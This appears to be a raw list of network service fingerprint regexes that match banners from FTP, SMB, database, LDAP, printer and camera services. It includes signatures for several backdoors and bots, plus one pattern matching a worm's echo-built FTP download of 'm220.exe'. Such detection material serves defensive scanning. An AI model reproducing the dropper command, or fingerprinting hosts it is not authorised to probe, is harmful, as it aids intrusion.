+\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 